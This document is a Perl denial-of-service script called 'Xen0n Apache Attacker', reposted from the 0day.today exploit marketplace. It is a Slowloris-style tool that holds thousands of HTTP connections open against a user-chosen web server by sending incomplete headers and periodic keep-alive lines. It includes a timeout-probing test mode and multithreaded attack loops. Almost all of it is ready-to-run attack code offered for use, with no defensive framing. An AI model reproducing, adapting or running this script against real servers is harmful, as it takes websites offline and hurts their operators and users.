Apache Layer7 DDoS Script

1. #!/usr/bin/perl -w
2. # Exploit Title: Apache Server Denial of Service exploit (DDOS)
3. # Date: 22/10/2011
4. # Author: Xen0n
5. # Software Link: http://www.apache.org/dyn/closer.cgi
6. # Version: 2.3.14 and older
7. # Tested on: CentOs
8. #feel free to contact us xenon.sec@gmail.com
9. use strict;
10. use IO::Socket::INET;
11. use IO::Socket::SSL;
12. use Getopt::Long;
13. use Config;
14.  
15. $SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors
16.  
17. print <<EOTEXT;
18.           ooooooo  ooooo                         .oooo.              
19.            `8888    d8'                         d8P'`Y8b              
20.              Y888..8P     .ooooo.  ooo. .oo.   888    888 ooo. .oo.  
21.               `8888'     d88' `88b `888P"Y88b  888    888 `888P"Y88b  
22.              .8PY888.    888ooo888  888   888  888    888  888   888  
23.             d8'  `888b   888    .o  888   888  `88b  d88'  888   888  
24.           o888o  o88888o `Y8bod8P' o888o o888o  `Y8bd8P'  o888o o888o
25.                                                                        
26. Welcome to Xen0n Apache Attacker
27.  
28. EOTEXT
29.  
30. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
31. my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
32. my $result = GetOptions('shost=s'   => \$shost,'dns=s'     => \$host,'xenon' => \$xenon,'num=i'     => \$connections,'cache'     => \$cache,'port=i'    => \$port,'https'     => \$ssl,'tcpto=i'   => \$tcpto,'test'      => \$test,'timeout=i' => \$timeout,'version'   => \$version,);
33.  
34. if ($version) {
35.     print "Version 1.0\n";
36.     exit;
37. }
38.  
39. unless ($host) {
40.     print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
41.     print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";
42.  
43.     print "\n\temail: xenon.sec@ gmail.com\n";
44. print "\n";
45.     exit;
46. }
47.  
48. unless ($port) {
49.     $port = 80;
50.     print "Defaulting to port 80.\n";
51. }
52.  
53. unless ($tcpto) {
54.     $tcpto = 5;
55.     print "Defaulting to a 5 second tcp connection timeout.\n";
56. }
57.  
58. unless ($test) {
59.     unless ($timeout) {
60.         $timeout = 100;
61.         print "Defaulting to a 100 second re-try timeout.\n";
62.     }
63.     unless ($connections) {
64.         $connections = 1000;
65.         print "Defaulting to 1000 connections.\n";
66.     }
67. }
68.  
69. my $usemultithreading = 0;
70. if ( $Config{usethreads} ) {
71.     print "Multithreading enabled.\n";
72.     $usemultithreading = 1;
73.     use threads;
74.     use threads::shared;
75. }
76. else {
77.     print "No multithreading capabilites found!\n";
78.     print "Xen0n will be slower than normal as a result.\n";
79. }
80.  
81. my $packetcount : shared     = 0;
82. my $failed : shared          = 0;
83. my $connectioncount : shared = 0;
84.  
85. srand() if ($cache);
86.  
87. if ($shost) {
88.     $sendhost = $shost;
89. }
90. else {
91.     $sendhost = $host;
92. }
93. if ($xenon) {
94.     $method = "POST";
95. }
96. else {
97.     $method = "GET";
98. }
99.  
100. if ($test) {
101.     my @times = ( "1", "30", "90", "240", "500" );
102.     my $totaltime = 0;
103.     foreach (@times) {
104.         $totaltime = $totaltime + $_;
105.     }
106.     $totaltime = $totaltime / 60;
107.     print "Testing $host could take up to $totaltime minutes.\n";
108.  
109.     my $delay   = 0;
110.     my $working = 0;
111.     my $sock;
112.  
113.     if ($ssl) {
114.         if (
115.             $sock = new IO::Socket::SSL(
116.                 PeerAddr => "$host",
117.                 PeerPort => "$port",
118.                 Timeout  => "$tcpto",
119.                 Proto    => "tcp",
120.             )
121.           )
122.         {
123.             $working = 1;
124.         }
125.     }
126.     else {
127.         if (
128.             $sock = new IO::Socket::INET(
129.                 PeerAddr => "$host",
130.                 PeerPort => "$port",
131.                 Timeout  => "$tcpto",
132.                 Proto    => "tcp",
133.             )
134.           )
135.         {
136.             $working = 1;
137.         }
138.     }
139.     if ($working) {
140.         if ($cache) {
141.             $rand = "?" . int( rand(99999999999999) );
142.         }
143.         else {
144.             $rand = "";
145.         }
146.         my $primarypayload =
147.             "GET /$rand HTTP/1.1\r\n"
148.           . "Host: $sendhost\r\n"
149.           . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
150.           . "Content-Length: 42\r\n";
151.         if ( print $sock $primarypayload ) {
152.             print "Connection successful, now just wait...\n";
153.         }
154.         else {
155.             print
156. "That's odd - I connected but couldn't send the data to $host:$port.\n";
157.             print "Is something wrong?\nDying.\n";
158.             exit;
159.         }
160.     }
161.     else {
162.         print "Uhm... I can't connect to $host:$port.\n";
163.         print "Is something wrong?\nDying.\n";
164.         exit;
165.     }
166.     for ( my $i = 0 ; $i <= $#times ; $i++ ) {
167.         print "Trying a $times[$i] second delay: \n";
168.         sleep( $times[$i] );
169.         if ( print $sock "X-a: b\r\n" ) {
170.             print "\tWorked.\n";
171.             $delay = $times[$i];
172.         }
173.         else {
174.             if ( $SIG{__WARN__} ) {
175.                 $delay = $times[ $i - 1 ];
176.                 last;
177.             }
178.             print "\tFailed after $times[$i] seconds.\n";
179.         }
180.     }
181.  
182.     if ( print $sock "Connection: Close\r\n\r\n" ) {
183.         print "Okay that's enough time. Xen0n closed the socket.\n";
184.         print "Use $delay seconds for -timeout.\n";
185.         exit;
186.     }
187.     else {
188.         print "Remote server closed socket.\n";
189.         print "Use $delay seconds for -timeout.\n";
190.         exit;
191.     }
192.     if ( $delay < 166 ) {
193.         print <<EOSUCKS2BU;
194. Since the timeout ended up being so small ($delay seconds) and it generally
195. takes between 200-500 threads for most servers and assuming any latency at
196. all...  you might have trouble using Xen0n against this target.  You can
197. tweak the -tcpto flag down to 1 second but it still may not build the sockets
198. in time.
199. EOSUCKS2BU
200.     }
201. }
202. else {
203.     print
204. "Attacking $host:$port every $timeout seconds with $connections sockets:\n";
205.  
206.     if ($usemultithreading) {
207.         domultithreading($connections);
208.     }
209.     else {
210.         doconnections( $connections, $usemultithreading );
211.     }
212. }
213.  
214. sub doconnections {
215.     my ( $num, $usemultithreading ) = @_;
216.     my ( @first, @sock, @working );
217.     my $failedconnections = 0;
218.     $working[$_] = 0 foreach ( 1 .. $num );    #initializing
219.     $first[$_]   = 0 foreach ( 1 .. $num );    #initializing
220.     while (1) {
221.         $failedconnections = 0;
222.         print "\t\tBuilding sockets.\n";
223.         foreach my $z ( 1 .. $num ) {
224.             if ( $working[$z] == 0 ) {
225.                 if ($ssl) {
226.                     if (
227.                         $sock[$z] = new IO::Socket::SSL(
228.                             PeerAddr => "$host",
229.                             PeerPort => "$port",
230.                             Timeout  => "$tcpto",
231.                             Proto    => "tcp",
232.                         )
233.                       )
234.                     {
235.                         $working[$z] = 1;
236.                     }
237.                     else {
238.                         $working[$z] = 0;
239.                     }
240.                 }
241.                 else {
242.                     if (
243.                         $sock[$z] = new IO::Socket::INET(
244.                             PeerAddr => "$host",
245.                             PeerPort => "$port",
246.                             Timeout  => "$tcpto",
247.                             Proto    => "tcp",
248.                         )
249.                       )
250.                     {
251.                         $working[$z] = 1;
252.                         $packetcount = $packetcount + 3;  #SYN, SYN+ACK, ACK
253.                     }
254.                     else {
255.                         $working[$z] = 0;
256.                     }
257.                 }
258.                 if ( $working[$z] == 1 ) {
259.                     if ($cache) {
260.                         $rand = "?" . int( rand(99999999999999) );
261.                     }
262.                     else {
263.                         $rand = "";
264.                     }
265.                     my $primarypayload =
266.                         "$method /$rand HTTP/1.1\r\n"
267.                       . "Host: $sendhost\r\n"
268.                       . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
269.                       . "Content-Length: 42\r\n";
270.                     my $handle = $sock[$z];
271.                     if ($handle) {
272.                         print $handle "$primarypayload";
273.                         if ( $SIG{__WARN__} ) {
274.                             $working[$z] = 0;
275.                             close $handle;
276.                             $failed++;
277.                             $failedconnections++;
278.                         }
279.                         else {
280.                             $packetcount++;
281.                             $working[$z] = 1;
282.                         }
283.                     }
284.                     else {
285.                         $working[$z] = 0;
286.                         $failed++;
287.                         $failedconnections++;
288.                     }
289.                 }
290.                 else {
291.                     $working[$z] = 0;
292.                     $failed++;
293.                     $failedconnections++;
294.                 }
295.             }
296.         }
297.         print "\t\tSending data.\n";
298.         foreach my $z ( 1 .. $num ) {
299.             if ( $working[$z] == 1 ) {
300.                 if ( $sock[$z] ) {
301.                     my $handle = $sock[$z];
302.                     if ( print $handle "X-a: b\r\n" ) {
303.                         $working[$z] = 1;
304.                         $packetcount++;
305.                     }
306.                     else {
307.                         $working[$z] = 0;
308.                         #debugging info
309.                         $failed++;
310.                         $failedconnections++;
311.                     }
312.                 }
313.                 else {
314.                     $working[$z] = 0;
315.                     #debugging info
316.                     $failed++;
317.                     $failedconnections++;
318.                 }
319.             }
320.         }
321.         print
322. "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
323.         sleep($timeout);
324.     }
325. }
326.  
327. sub domultithreading {
328.     my ($num) = @_;
329.     my @thrs;
330.     my $i                    = 0;
331.     my $connectionsperthread = 50;
332.     while ( $i < $num ) {
333.         $thrs[$i] =
334.           threads->create( \&doconnections, $connectionsperthread, 1 );
335.         $i += $connectionsperthread;
336.     }
337.     my @threadslist = threads->list();
338.     while ( $#threadslist > 0 ) {
339.         $failed = 0;
340.     }
341. }
342.  
343. __END__
344.  
345.  
346.  
347. #  0day.today [2020-05-21]  #
348. 0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
349. Send all submissions to mr.inj3ct0r[at]gmail.com
350. Copyright © 2008-2020 0day Today Team